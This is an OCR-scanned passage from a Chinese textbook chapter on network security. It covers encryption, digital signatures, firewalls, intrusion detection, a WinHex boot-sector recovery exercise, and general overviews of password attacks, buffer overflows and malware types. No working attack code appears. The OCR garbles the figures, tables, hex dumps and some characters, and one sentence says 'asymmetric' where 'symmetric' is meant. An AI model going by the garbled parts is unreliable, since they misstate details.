行 加 密 。 但 是 ,由 于 加 密 密 钥 和 解密 密 钥 相同 , 密 钥 传输 和 管理 成 为 制约 数据 安全 的 重要 因 
素 。 为 此 , 另 一 种 更 安全 的 非 对 称 加 密 算法 应 运 而 生 。 

非 对 称 加 密 算 法 使 用 两 个 不 同 密 钥 完成 数据 加 解密 过 程 。 一 个 密 钥 用 于 加 密 , 称 为 公 
钥 ; 另 一 个 用 于 解密 , 称 为 私 钥 。 公 钥 和 私 钥 通过 一 定 算法 成 对 生成 ,不 能 从 公 钥 推导 出 私 
钥 , 也 不 能 从 私 钥 推导 出 公 钥 。 在 传输 时 ,接收 方 生成 一 对 密 钥 并 将 其 中 一 把 作为 公 钥 以 明 
文 方式 传输 至 发 送 方 , 公 钥 可 以 对 所 有 人 公开 ; 发 送 方 利用 公 钥 对 明文 加 密 传输 至 接收 方 ; 
最 后 接收 方 使 用 另 一 把 配对 私 钥 完成 数据 解密 。 在 非 对 称 加 密 过 程 中 ,由 于 私 钥 不 需 经 过 
网 络 随 数据 传输 ,而 是 由 接收 方 生成 妥善 保存 ,因而 可 避免 传统 非 对 称 加 密 算法 中 因 密 钥 分 
发 管理 带 来 的 安全 威胁 。 

非 对 称 加 密 算 法 保密 性 好 ,但 加 密 和 解密 时 间 长 .速度 慢 , 一 般 应 用 于 对 少量 敏感 数据 
的 加 密 , 其 代表 作 是 RSA 公 钥 算法 , 它 能 抵抗 目前 所 有 密码 的 猜测 和 攻击 ,广泛 应 用 于 网 上 
银行 .电子 政务 ,数字 签名 等 领域 。 


8.2.2 数字 签名 


数字 签名 (Digital Signature) 是 手写 签名 的 电 字模 拟 , 它 通 过 对 数据 计算 处 理 以 产生 一 
段 特殊 字符 串 消息 ,该 消息 具有 与 手写 签名 同样 特点 ,是 可 信 的 、 不 可 伪造 的 \ 不 可 重用 的 、 
不 可 抵赖 的 以 及 不 可 修改 的 ,这 种 消息 被 称 为 数字 签名 。 与 手写 签名 类 似 , 数 字 签 名 至 少 应 
满足 以 下 3 个 条 件 。 

(1) 签名 者 事后 不 能 否认 自己 的 签名 。 

(2) 接收 者 能 验证 签名 ,而 任何 其 他 人 都 不 能 伪造 该 签名 。 

(3) 当 双 方 就 签名 发 生 争执 时 ,可 由 第 三 方 鉴 别 真 伪 。 

一 个 数字 签名 方案 由 签名 算法 和 验证 算法 组 成 。 签 名 算法 密 钥 属于 私 钥 ,由 签名 人 妥 
善 保存 。 验 证 算法 是 公开 的 ,以 便 他 人 验证 。 签 名 与 加 密 很 相似 ,一 般 是 签名 者 利用 私 铀 对 


@ 异 或 (xor) 算 法 : 两 值 相 同 结果 为 假 ,两 值 不 同 结果 为 真 。 在 第 1 周期 , 扩 频 后 信号 "1" 与 密 钥 "1” 异 或 得 到 密 文 
“0”; 第 2 周期 , 扩 频 后 信号 “1” 与 密 钥 "0” 异 或 得 到 密 文 “1” ,其 后 类 推 。 
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数据 进行 加 密 , 验 证 方 利用 签名 者 提供 的 公 钥 完成 对 数据 的 解密 。 签 名 与 加 密 的 不 同 之 处 
在 于 ,加 密 目 的 是 保护 信息 不 被 非 授 权 用 户 访问 ; 而 签名 目的 不 是 对 数据 进行 加 密 , 而 是 让 
接收 方 明确 信息 的 发 送 者 以 及 信息 是 否 被 他 人 算 改 。 图 8-2 给 出 数字 签名 的 基本 流程 。 假 
设 A 需要 签名 发 送 一 份 电子 合同 给 B,A 签名 步骤 如 下 。 

(1) A 使 用 Hash 函数 根据 电子 合同 文件 生成 消息 摘要 。 

(2) A 使 用 私 钥 将 消息 摘要 加 密 , 完 成 数字 签名 。 

(3) A 把 电子 合同 文件 (明文 ) 数字 签名 ( 密 文 ) 和 公 钥 一 起 发 送 至 B。 


电子 台 同 

EE Hash 函 数 

Fe SE 用 发 送 者 的 私 

和 钥 签名 本 要 
= i 
消息 摘要 子 台 同 


图 8-2 数字 签名 的 基本 流程 


B 收 到 电子 合同 文件 及 数字 签名 后 ,要 验证 电子 合同 是 A 认可 的 ,验证 步骤 如 下 。 

(1) B 使 用 与 A 相同 的 Hash 算法 生成 电子 合同 文件 的 消息 摘要 。 

(2) B 使 用 A 的 公 钥 解密 A 发 送 的 消息 摘要 。 

(3) B 将 生成 的 消息 摘要 和 解密 的 消息 摘要 比较 ,车 两 者 相同 则 表明 电子 合同 文件 来 
自 A, 并 且 数 据 没 有 经 过 算 改 ; 如 果 两 者 不 一 致 则 表明 电子 合同 文件 被 算 改 或 者 非 A 认证 。 
数字 签名 的 验证 过 程 如 图 8-3 所 示 。 


一 一 电子 合同 = 

3 全 | | Hash 函 数 

a 和 | 

从 名 的 消息 摘要 
“合同 车 比 
下 一 -名 
签名 用 发 送 者 的 消息 摘要 
a 消息 摘要 


图 8-3 数字 签名 的 验证 过 程 


8.2.3 防火墙 


防火 墙 本 义 是 指 古代 房屋 之 间 修 建 的 泥 墙 ,用 以 防范 火灾 营 延 到 邻 舍 。 在 计算 机 网 络 
中 ,网 络 防 火 墙 扮 演 着 类 似 功 能 ,通过 限制 内 外 网 用 户 之 间 的 相互 访问 ?消除 潜在 的 安全 威 
胁 。 目 前 ,防火 墙 主 要 采用 包 过 滤 、 应 用 层 网 关 和 状态 检测 3 种 技术 。 


@ 防火墙 原本 用 于 限制 外 网 访问 内 网 ,避免 内 网 用 户 受到 攻击 ,但 也 可 以 根据 一 定 规则 限制 内 网 访问 外 网 。 
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1. 包 过 滤 防 火 墙 

包 过 滤 防 火 墙 可 以 分 为 第 一 代 静 态 包 过 滤 防 火 墙 和 第 二 代 动 态 包 过 滤 防 火 墙 。 

静态 包 过 滤 防 火 墙 通过 分 析 对 数据 包 收 发 双方 的 IP 地 址 、 端 口号、 协议 类 型 (如 TCP 
包 、UDP 包 、ICMP 包 等 ) 等 信息 ,根据 过 滤 规 则 决定 是 否 允 许 数据 包 经 过 。 静 态 包 过 滤 防 
火 墙 遵循 "最 小 特权 原则 ”, 通 过 明确 允许 通过 数据 包 , 从 而 限制 其 他 数据 包 ,实现 简洁 高 效 ， 
但 是 过 滤 规 则 一 旦 泄露 便 不 可 识别 来 自 外 网 的 欺骗 攻 击 。 例 如 ,防火 墙 通过 丢弃 含有 BT 
端口 的 数据 包 , 从 而 禁止 该 软件 的 滥用 堵塞 带宽 ,但 是 内 外 网 用 户 可 以 重新 协商 新 的 BT 端 
口号 绕 过 防火 墙 限制 。 

动态 包 过 滤 防 火 墙 采 用 动态 配置 过 滤 规 则 ,避免 静态 过 滤 所 产生 的 问题 ,后 来 发 展 成 包 
状态 监测 技术 。 动 态 包 过 滤 防 火 墙 通过 跟踪 分 析 内 外 网 络 之 间 的 TCP 连接 动态 生成 过 滤 
规则 ,从 而 避免 因 修改 IP 报头 首部 而 进行 的 欺骗 攻击 。 但 是 ,动态 规则 必须 适应 网 络 的 动 
态 变化 , 且 过 滤 复 杂 ,形成 过 滤 规 则 需要 一 定时 间 。 例 如 ,内 外 网 用 户 通过 协商 BT 端口 号 
绕 过 静态 防火 墙 匹 配 过 则 ,占用 过 多 带宽 ,而 动态 包 过 滤 防 火 墙 可 以 根据 畸形 带宽 比例 重新 
生成 过 滤 规 则 ,再 次 丢弃 BT 软件 包 。 

包 过 滤 防 火 墙 工作 于 网 络 层 和 传输 层 ,配置 的 过 滤 规 则 只 能 检查 数据 报头 首部 ,不 会 分 
析 所 携带 数据 ,实现 简单 ,过 滤 速 度 很 快 .但 是 无 法 审核 数据 报 内 容 , 也 无 法 检测 是 否 携 带 病 
毒 ,一 般 作为 抵御 入 侵 \ 维 护 网 络 安全 的 第 一 道 防线 。 

2. 代理 防火 墙 

代理 防火 墙 也 被 称 为 应 用 层 网 关 防 火 墙 ,分 为 第 一 代 代理 防火 墙 和 第 二 代 自 适应 代理 
防火 墙 。 

代理 防火 墙 是 在 内 部 网 络 与 外 部 网 络 之 间 充 当中 介 作 用 ,通过 代理 转发 机 制 隐藏 内 部 
网 络 结构 。 当 代理 服务 器 接收 到 客户 访问 外 网 的 连接 请 求 时 , 替 客户 端 将 连接 请 求 转 发 至 
外 网 服务 器 ,并 把 服务 器 应 答 返 回 给 相应 客户 ,这 种 中 介 机 制 被 称 为 代理 。 由 于 每 个 内 外 网 
络 之 间 的 连接 都 要 通过 代理 防火 墙 的 介入 和 转换 ,内 外 网 用 户 不 能 直接 通信 ,因而 可 避免 内 
网 主机 遭受 的 和 人 侵 和 攻击 。 但 是 ,由 于 每 次 连接 都 要 代理 介入 ,代理 防火 墙 处 理 速 度 相对 较 
慢 , 故 通常 会 成 为 内 外 网 络 之 间 的 瓶颈 。 

自 适 应 代理 防火 墙 也 被 称 为 动态 代理 防火 墙 , 它 结合 包 过 滤 防 火 墙 和 代理 防火 墙 的 各 
自 优点 ,其 中 自 适 应 代理 防火 墙 比 代理 防火 墙 更 灵活 , 它 根据 用 户 定义 的 安全 策略 动态 适 
应 网 络 分 组 流量 ,满足 实时 过 滤 需 求 。 管 理 员 只 需要 设置 服务 类 型 .安全 级 别 等 信息 , 自 
适应 代理 防火 墙 就 会 根据 配置 参数 自动 选择 代理 转发 还 是 包 过 滤 ,并 动态 生成 连接 和 过 
滤 规 则 。 

3. 状态 检测 防火 墙 

状态 检测 防火 墙 工 作 在 数据 链 路 层 和 网 络 层 之 间 ,通过 检测 引擎 截获 数据 包 状 态 信息 ， 
并 匹配 安全 策略 以 决定 拒绝 还 是 接受 连接 。 状 态 检测 防火 墙 安全 性 较 高 ,具有 很 好 的 适应 
性 和 扩展 性 ,并且 所 有 数据 包 都 在 低层 处 理 而 不 需 涉 及 协议 栈 , 可 以 有 效 减 少 系统 开销 , 提 
高 执行 效率 ,经 常 应 用 于 动态 复杂 的 大 规模 网 络 。 

上 述 3 种 防火 墙 都 有 独特 之 处 ,在 实际 中 需要 多 种 技术 配合 使 用 才能 扬长 避 短 ,解决 网 
络 安全 问题 。3 种 防火 墙 技术 的 特点 见 表 8-1。 
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表 8-1 3 种 防火 墙 技术 的 特点 
特点 包 过 滤 防 火 墙 代理 防火 墙 状态 检测 防火 墙 
对 数据 包 进行 过 滤 从 | 以 中 介 方 式 连接 内 外 网 络 , 避 | 通过 检测 数据 包 状 态 决 定 是 否 允 许 
而 避免 外 网 人 侵 行为 | 免 直接 连接 带 来 的 人 侵 行为 内 外 网 络 的 连接 和 数据 包 的 放行 
价格 低廉 ,实现 简单 ,| 安全 性 较 高 ,可 以 避免 数据 驱 | 安全 性 高 ,适应 灵活 ,扩展 性 好 ,处 理 


实现 原理 


点 
优点 。。 | 处 理性 能 很 高 动 式 攻击 性 能 较 高 
安全 性 较 低 , 容易 造 | 处 理性 能 较 慢 , 会 成 为 干 光 网 
点 六 证 这 
缺点 。 | 成 数据 驱动 式 攻击 。 | 络 的 瓶 到 eke 
适应 范围 | 小 规模 网 络 各 种 网 络 环境 大 规模 网 帝 
8.2.4 入 侵 检 测 


防火 墙 属于 被 动 防御 ,通过 定义 的 匹配 规则 过 滤 数 据 类 型 ,检测 入 侵 行为 ,方便 快捷 ,但 
是 不 能 抵御 未 知 攻 击 。 入 侵 检测 系统 IDS(Intrusion Detection System) 是 一 种 主动 防御 体 
系 , 它 从 计算 机 系统 或 网 络 环境 中 采集 分 析 数 据 , 通 过 检测 引擎 判断 可 疑 攻击 和 异常 事件 ， 
在 计算 机 网 络 和 系统 受到 危害 前 拦截 特征 行为 攻击 。 当 网 络 遭 受 和 侵 后 ,IDS 还 能 收集 入 
侵 行为 等 相关 信息 并 纳入 知识 库 , 从 而 避免 重复 或 类 似 攻击 。 这 种 主动 学 习 方式 可 以 增强 
系统 防范 能 力 , 有 效 弥 补 防火 墙 被 动 防御 的 不 足 。 入 侵 检测 系统 根据 检测 技术 可 以 为 分 特 
征 检 测 、 异 常 检测 和 协议 分 析 3 类 。 

(1) 特征 检测 是 通过 监视 连接 活动 并 匹配 行为 特征 来 检测 入侵 ,通过 已 知人 侵 手 段 检 
测 人 侵 行为 。 特 征 检 测 判断 入 侵 行为 准确 度 很 高 ,并 且 对 检测 结果 有 明确 处 理 和 参照 ,但 检 
测 依赖 行为 特征 库 和 系统 环境 ,通用 性 不 好 ,不 能 检测 未 知 攻击 ,很 难 将 具体 和 人 侵 手 段 抽象 
成 特征 ,而 且 难 以 检测 内 部 网 络 的 入侵 行为 。 

(2) 异常 检测 是 利用 系统 或 用 户 正常 行为 模式 检测 人 侵 。 异 常 检 测 基于 一 般 用 户 正常 
行为 模式 , 当 系 统 运行 时 系统 将 实时 行为 与 正常 行为 进行 匹配 ,一 旦 发 生 显著 偏离 即 判 为 和 
侵 。 异常 检测 方法 与 系统 环境 无 关 , 通 用 性 较 好 ,可 以 检测 未 知 攻 击 , 但 需要 对 用 户 行为 做 
特征 描述 , 兼 之 个 人 行为 的 不 确定 性 和 偶然 性 导致 检测 算法 异常 复杂 ,处 理性 能 缓慢 ,并 且 
漏 报 误 报 率 较 高 。 

(3) 基于 协议 分 析 的 入 侵 检测 系统 是 利用 网 络 协议 规则 检测 攻击 行为 ,简单 高 效 , 但 其 缺 
点 是 不 能 检测 未 知 攻 击 ,不 能 弥补 协议 漏洞 , 兼 之 基于 具体 的 网 络 协议 和 系统 环境 ,通用 性 不 好 。 

目前 ,网 络 人 侵 技术 层出不穷 ,相应 的 检测 技术 已 明显 滞后 于 攻击 技术 的 更 新 。 异 常 检 
测 技 术 因 其 能 检测 未 知人 侵 的 独特 优势 和 较 好 的 通用 性 ,成 为 人 侵 检测 系统 的 发 展 趋势 。 


8.3 黑客 攻击 手段 与 防御 


工作 任务 十 五 ”恢复 数据 


工作 目的 
恢复 无 法 格式 化 U 盘 中 的 数据 。 
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工作 任务 

小 张 是 公安 局 科技 部 工作 人 员 , 在 查处 聚 赌 窝点 过 程 中 找到 一 张 废弃 4GB U 盘 , 但 该 
U 盘 无 法 在 “我 的 电脑 ”中 识别 ,更 无 法 格式 化 。 上 级 要 求 小 张 尝试 恢复 U 盘 数 据 以 便于 案 
情 的 进一步 调查 。 

任务 分 析 

小 张 将 U 盘 插 入 计算 机 ,发 现 U 盘 在 “设备 管理 器 "中 的 “磁盘 驱动 器 "中 需要 经 过 很 长 
时 间 才 能 识别 ,而 在 “我 的 电脑 ”中 没有 显示 该 U 盘 , 无 法 从 中 读 取 数 据 , 更 无 法 格式 化 。 经 
上 述 判 断 ,U 盘 第 0 扇 区 损毁 可 能 性 很 大 ,小 张 准备 利用 WinHex 文件 编辑 工具 尝试 修复 
U 盘 并 恢复 数据 。 

工作 环境 和 工具 

(1) 磁盘 分 区 引导 信息 位 于 磁盘 0 一 2 扇 区 (主要 集中 第 0 扇 区 ) ,由 MBR、DPT、DBR 
等 部 分 组 成 。 主 引导 扇 区 MBR 用 于 启动 时 将 控制 权 转 交 给 用 户 指定 的 操作 系统 分 区 ; 硬 
盘 分 区 表 DPT 用 于 标识 磁盘 分 区 数量 大 小 等 信息 ; 分 区 引导 扇 区 DBR 是 磁盘 分 区 高 级 格 
式 化 时 写 人 扇 区 的 内 容 , 若 该 区 间 损 毁 则 会 导致 磁盘 分 区 的 无 法 识别 。 

当 磁 盘 容 量 小 于 等 于 4GB 时 ,默认 格式 化 分 区 为 FAT32 格式 。FAT32 引导 扇 区 占据 
6 个 扇 区 ,其 中 前 3 个 扇 区 是 引导 扇 区 ,后 3 个 扇 区 是 保留 扇 区 ,和 暂 未 使 用 。 引 导 扇 区 对 引 
导 操 作 系统 和 访问 磁盘 文件 至 关 重 要 .引导 扇 区 的 损坏 会 导致 操作 系统 无 法 启动 ,文件 不 能 
读 写 等 现象 。 由 于 引导 扇 区 的 重要 性 , 故 FAT32 文件 系统 在 第 6 扇 区 对 引导 扇 区 进行 备 
份 , 当 引 导 扇 区 损毁 时 可 以 通过 第 6 扇 区 的 备份 还 原 分 区 信息 ,从 而 恢复 数据 。 

(2) WinHex 是 十 六 进 制 磁盘 文件 编辑 工具 。WinHex 文件 小 .速度 快 ,可 以 对 磁盘 数 
据 做 Hex 与 ASCII 码 编辑 修改 ,用 于 检查 和 修复 磁盘 文件 .恢复 误 删除 数据 ,同时 还 可 以 扫 
描 通 过 程序 隐藏 的 文件 和 数据 。 

具体 工作 环境 见 表 8-2 ,工具 可 在 http://www. gdcp. cn/jpkcVl 中 下 载 。 

表 8-2 工作 环境 表 


主机 名 称 担任 角色 操作 系统 工具 软件 
主机 1 小 张 Windows XP WinHex 无 法 格式 化 的 U 盘 
工作 过 程 


(1) 将 口 盘 插入 计算 机 ,打开 WinHex 编辑 工具 ,选择 “工具 ”打开 磁盘 ”命令 ,然后 
在 弹出 的 对 话 框 中 选中 U 盘 型 号 ,如 “KingstoneDT 101 G2”, 如 图 8-4 所 示 。 如 果 磁 盘 引 
导 信息 损毁 , 则 该 步骤 会 很 慢 。 

(2) WinHex 中 磁盘 数据 以 十 六 进 制 显示 ,第 0 扇 区 地 址 从 *00000000 一 “000001FF”， 
第 1 扇 区 地 址 从 *00000200”~“000003FF”, 以 此 类 推 。 在 图 8-5 中 可 以 发 现 ,U 盘 第 0 扇 区 
损毁 严重 ,很 多 区 域 被 0 填充 。 

(3) 选择 “位 置 " 一 Goto To Sector 命令 跳 到 第 6 扇 区 ,地 址 从 “00000C00” 一 
“00000DFF”。 选 中 整个 第 6 扇 区 , 右 击 ,在 弹出 的 快捷 菜单 中 选择 “编辑 ”~Copy Block 一 
“标准 ”命令 复制 第 6 扇 区 数据 ,如 图 8-6 所 示 。 

(4) 跳 回 第 0 扇 区 选中 所 有 数据 , 右 击 . 在 弹出 的 快捷 菜单 中 选择 “编辑 ”> 剪贴 板 数 
据 ”- 写 人 ”命令 ,将 第 6 扇 区 数据 写 入 0 肩 区 ,退出 并 保存 ,如 图 8-7 所 示 。 
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三 临时 文件 赤 了 :)，]00 

< 前 经 交 (5:)，]00 
Renovable medim 0:), BM 1 


日 鲁 Physicd medis 


图 8-4 选中 待 恢复 的 磁盘 


Offset CD EF 
00000000 |EB 58 90 4D 53 44 4F 53 35 2E 30 00 02 08 24 00 
00000010 |02 00 00 00 00 F8 00 00 3F 00 FF 00 00 00 00 00 
00000020 |00 80 77 00 D2 1D 00 00 00 00 00 00 02 00 00 00 
00000030 [00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000040 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000050 |oo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000060 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000070 |oo oo oo 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000080 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00000090 |oo oo 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
000000A0 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 B9 
000000B0 |ol 00 00 00 o0 00 00 00 00 00 00 00 00 00 00 00 
000000c0 |00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
000000D0 


Sector0 of 7631552 


图 8-5 查看 第 0 扇 区 


00000Cc00 EB 58 90 4D 53 44 4F 53 35 2E 30 00 02 08 24 00 
00000C10 3F 00 FF 00 00 00 00 00 
00000C20 00 00 00 00 02 00 00 00 


00000C30 
00000C40 


Hex 数值 0) CtrltShi fttC 
沉 缉 | CE) ALttShifttC 


00000C60 | 7B| 过 加 
00000C70 | ED| 。 粘贴 堆 字 节 @) 
00000C80 | B6| 


定义 选 块 QD) GREP Hex G@) 
2092 G9 wim culth| c HMBC 
00000CB0 | 0 清除 过 块 到 ) Esc | Pascal 源码 ) 
00000CC0 8 mM HA ET 00 CD 10 EB 


00000CD0 “EE 时 修改 数据 册 ..， CtrltT 
00000CE0 = 66 CtrltL 
00000CFO S53 


7D EB E0 98 CD 16 CD 19 
4A 00 66 6A 00 66 50 06 
7E 02 00 OF 85 20 00 B4 


Sector 6 of 7831552 | Offset: cool =238| Block 


Offset 6 
00000000 35 2E 30 00 02 08 24 00 
00000010 3F 00 FF 00 00 00 00 00 
00000020 00 00 00 00 02 00 00 00 
00000030 00 00 00 00 00 00 00 00 
00000040 00 00 00 00 

00000050 

00000060 

00000070 

00000080 

00000090 


000000A0 00 
000000B0 -01 
000000c0 oo 
000000D0 00 
000000E0 66 


00 00 00 
00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
00 EB E0 98 CD 16 CD 19 
4A 00 66 6A 00 66 50 06 
000000F0 = 53 7E 02 00 OF 85 20 00 B4 
00000100 | a BE 00 00 00 00 00 00 00 00 


Sector 0 of 7831552 | Det 1 于 =254| Block 


图 8-7 向 第 0 扇 区 写 人 数据 


CtrltA 
清除 选 块 四) Ese 


本 共立 由 CtrltB 
CtrltT 
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(5) 将 U 盘 重 新 插入 计算 机 ,发 现 计 算 机 重新 识别 U 盘 并 显示 在 “我 的 电脑 ”中 ,打开 
U 盘 可 以 读 取 原 有 数据 。 


任务 总 结 儿 


(1) 上 述 方法 同样 适用 于 修复 无 法 正常 格式 化 的 U 盘 或 磁盘 。 

(2) 只 有 人 逻辑 损坏 而 无 法 格式 化 磁盘 才 可 以 修复 或 恢复 数据 。 磁 盘 逻 辑 损坏 时 仍 可 以 
在 "设备 管理 器 "中 的 "磁盘 驱动 器 "中 检测 到 具体 型 号 , 若 检测 不 到 型 号 则 属于 物理 损坏 ,不 
可 通过 软件 修复 。 

(3) 磁盘 数据 丢失 后 要 禁止 对 磁盘 做 写 操作 , 即 不 能 把 数据 复制 到 磁盘 分 区 中 ,和 否则 会 
降低 数据 恢复 几率 ,或 数据 恢复 后 不 可 识别 。 

黑客 攻击 是 一 类 试图 控制 目标 主机 ,非法 获取 算 改 数据 ,或 导致 系统 瘫痪 无 法 提供 正常 
服务 的 攻击 ,常用 攻击 手段 有 以 下 形式 。 


8.3.1 口令 攻击 


口令 也 被 称 为 密码 ,是 保护 信息 系统 安全 第 一 道 屏障 ,获得 口令 就 意味 获得 系统 访问 第 
一 门槛 ,因此 针对 口令 的 攻击 是 最 基本 的 攻击 手段 。 窃 取 口 令 方法 主要 有 社会 工程 学 、 密 码 
分 析 与 还 原 和 网 络 监听 3 种 。 

1. 社会 工程 学 

社会 工程 学 的 研究 对 象 是 网 络 管理 人 员 ,通过 对 人 类 天 性 趋 于 信任 倾向 的 利用 ,以 交 
谈 说服、 假冒 和 欺骗 方法 获得 系统 访问 口令 。 目 前 , 打 电 话 是 最 流行 的 社会 工程 学 手段 ,和 
侵 者 通常 冒充 领导 或 重要 人 物 身份 打 电话 给 管理 员 套 取 账 号 信息 ,从 而 获得 访问 权限 。 翻 
垃圾 是 另 一 种 社会 工程 学 手段 ,公司 企业 废 置 丢弃 的 电话 秒 ,会 议 纪要 、 磁 盘 、 光 盘 等 都 会 向 
入 侵 者 提供 大 量 敏感 信息 。 例 如 ,电话 簿 可 以 提供 员工 姓名 与 电话 号 码 作 为 冒充 对 象 ; 会 
议 纪 要 可 能 包含 员工 账号 密码 和 安全 配置 等 ; 废 置 磁 盘 光 盘 即 使 损毁 或 格式 化 也 可 以 通过 
软件 修复 还 原 数据 。 

2. 密码 分 析 与 还 原 

密码 分 析 与 还 原 分 为 穷 举 法 和 密码 猜测 两 种 。 穷 举 法 也 被 称 为 暴力 破解 ,是 一 种 不 断 
尝试 密码 的 破译 方法 ,通过 不 同 密 钥 排列 组 合 逐 个 推算 直到 找 出 密码 为 止 9。 穷 举 法 理论 
上 可 以 破解 世上 所 有 密码 ,破解 时 间 与 密 钥 长 度 呈 指数 增长 。 因 此 ,任何 一 个 密码 都 有 保密 
期 。 例 如 ,用 目前 最 快 的 大 型 计算 机 至 少 需要 20 年 才能 将 密码 破解 ,那么 这 个 密码 保密 期 
就 是 20 年 。 当 今世 界 错综复杂 ,政治 斗争 云 波 施 诵 ,密码 保密 与 破解 能 力 实质 上 是 各 国 大 
型 计算 机 处 理 能 力 的 较量 ,美国 也 从 来 不 会 向 中 国 出 口 大 型 计算 机 。 中 国 大 型 计算 机 从 早 
期 银河 二 代 .银河 三 代 到 现在 天 河 一 号 2 都 靠 自主 研发 。 

为 减少 穷 举 法 破解 时 间 ,将 部 分 关键 字 , 如 管理 员 电话 号 码 .出 生日 期 、 姓 名 拼音 等 敏感 


@ 例如 ,一 个 四 位 数字 密码 共有 10000 种 组 合 ,因此 最 多 尝试 10000 次 就 能 找到 正确 密码 。 

加 2010 年 11 月 17 日 ,我 国 自主 研发 的 “天 河 一 号 "超级 计算 机 赁 每 秒 钟 4700 万 亿 次 运算 峰值 速度 脱颖而出 ,成 
为 世界 上 运算 速度 最 快 的 超级 计算 机 。2011 年 日 本 超级 计算 机 以 每 秒 8160 万 亿 次 再 次 刷新 纪录 ,其 每 个 处 理 器 都 是 八 
核 结构 , 共 548352 个 核心 .位 居 世 界 第 一 。 
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信息 与 其 他 字符 排列 组 合 ,进一步 缩短 破解 时 间 , 称 为 密码 猜测 。 

3. 网 络 监 

当 计 算 机 接收 到 不 是 发 向 给 它 的 分 组 时 ,将 会 丢弃 数据 包 。 但 是 ,攻击 者 只 要 将 网 卡 设 
置 为 “混杂 ”模式 便 可 以 捕获 网 络 中 所 有 数据 , 称 为 监听 。 网 络 监 听 原 本 用 于 协助 管理 员 监 
控 网 络 流量 ,排除 网 络 故障 、 优 化 传输 路 径 等 方面 ,但 同时 也 给 网 络 安全 带 来 隐患 ,造成 密码 
失窃 .数据 截获 、 网 络 定位 等 安全 事件 。 目 前 ,应 用 最 广泛 的 是 Sniffer 网 络 嗅 探 器 , 常 被 人 
侵 者 用 于 截获 用 户 账号 和 口令 。 

以 上 是 针对 口令 攻击 的 3 种 手段 。 应 对 口令 攻击 应 尽量 使 用 安全 口令 ,在 设置 口令 时 
应 注意 以 下 3 点 。 

(1) 口令 长 度 至 少 大 于 6 位 。 

(2) 大 小 写字 母 混合 。 如 果 只 使 用 一 个 大 写字 母 , 则 既 不 要 放 在 开头 也 不 要 放 在 结尾 。 

(3) 应 尽 可 能 把 数字 无 序 夹 杂 在 字母 中 。 


8.3.2 缓冲 区 溢出 攻击 


缓冲 区 是 程序 运行 时 在 内 存 中 为 保存 数据 类 型 (如 整形 .长 整形 等 ) 而 分 配 的 空间 。 然 
而 ,这 个 空间 大 小 是 有 限 的 ,存放 缓冲 区 数据 过 多 时 就 会 造成 溢出 ,产生 意 想不到 结果 2。 
攻击 者 通过 向 程序 缓冲 区 写 人 超出 其 长 度 的 数据 造成 溢出 ,从 而 破坏 程序 堆栈 转 而 执行 其 
他 命令 ,达到 攻击 目的 。 

缓冲 区 溢出 是 针对 计算 机 系统 最 底层 发 起 的 攻击 ,会 导致 系统 身份 验证 和 安全 策略 失 
效 。 由 于 缓冲 区 溢出 属于 系统 漏洞 入 侵 ,不 涉及 欺骗 伪造 , 故 系统 入侵 后 毫 无 症 相 ,防火 墙 
形同虚设 ,很 难 防范 和 界定 入 侵 行为 。 目 前 ,针对 缓冲 区 溢出 的 攻击 主要 有 两 方面 。 

(1) 及 时 发 现 弥 补 系 统 漏洞 。 缓 冲 区 溢出 攻击 根源 在 于 程序 本 身 ,因此 防范 缓冲 区 溢 
出 首先 应 确保 程序 代码 的 正确 性 和 严密 性 ,避免 程序 不 检查 变量 ,缓冲 区 大 小 不 一 及 边界 过 
小 等 情况 。 

(2) 基于 安全 策略 。 攻 击 者 在 攻击 某 一 系统 时 必须 事先 了 解 系统 相关 属性 ,如 版 本 、 服 
务 等 信息 ,因此 针对 缓冲 区 溢出 攻击 就 是 配置 访问 安全 策略 ,隐蔽 系统 属性 参数 。 


8.3.3 恶意 代码 


恶意 代码 是 一 种 计算 机 程序 ,恶意 代码 攻击 是 通过 把 代码 嵌入 计算 机 程序 以 达到 破坏 
数据 安全 性 和 完整 性 等 目的 的 攻击 。 恶 意 代码 有 两 种 分 类 标准 : 一 是 是 否 需要 宿主 , 即 特 
定 应 用 软件 或 系统 程序 ; 二 是 能 否 自我 复制 。 根 据 这 两 类 标准 可 以 把 恶意 代码 分 为 4 类 ， 
即 病毒 .蠕虫 .木马 和 恶作剧 ,具体 见 表 8-3。 

1. 计算 机 病毒 定义 和 分 类 

计算 机 病毒 是 可 感染 依附 性 恶意 代码 。 其 中 ,可 感染 性 表明 它 可 以 通过 自我 复制 感染 
别 的 程序 ; 依附 性 表示 它 不 可 以 自我 启动 ,必须 寄生 宿主 程序 ,只 有 运行 宿主 程序 病毒 才能 
被 激活 ,并 继续 感染 其 他 程序 。 


@ 如 在 C 语言 中 将 a 定 义 为 整形 ,而 整形 取 值 范围 是 一 32768 一 32767, 若 对 a 赋值 32768, 则 此 时 a 实际 值 为 
一 32768。 
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表 8-3 恶意 代码 分 类 


类 别 实 例 
可 感染 的 依附 性 恶意 代码 病毒 
可 感染 的 独立 性 恶意 代码 蠕虫 
不 感染 的 依附 性 恶意 代码 特洛伊 木马、 后门 
不 感染 的 独立 性 恶意 代码 恶作剧 


1994 年 2 月 18 日 ,我 国正 颁布 实施 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 》， 
在 (条例 ) 第 二 十 八条 中 明确 指出 :“ 计 算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 
计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代 
码 。 目 前 ,计算 机 病毒 种 类 繁多 ,即使 同一 种 病毒 也 可 以 发 生 多 种 变异 ,潜伏 时 间 长 ,系统 危 
害 性 大 。” 

2. 蠕虫 

蠕虫 是 一 种 利用 系统 漏洞 在 网 络 中 传播 的 恶意 程序 , 它 具 有 病毒 可 传染 性 特征 ,也 被 称 
为 蠕虫 病毒 。 但 是 ,其 与 传统 病毒 不 同 , 蠕 虫 不 需要 宿主 ,不 需要 寄生 于 程序 之 中 ,而 是 独立 
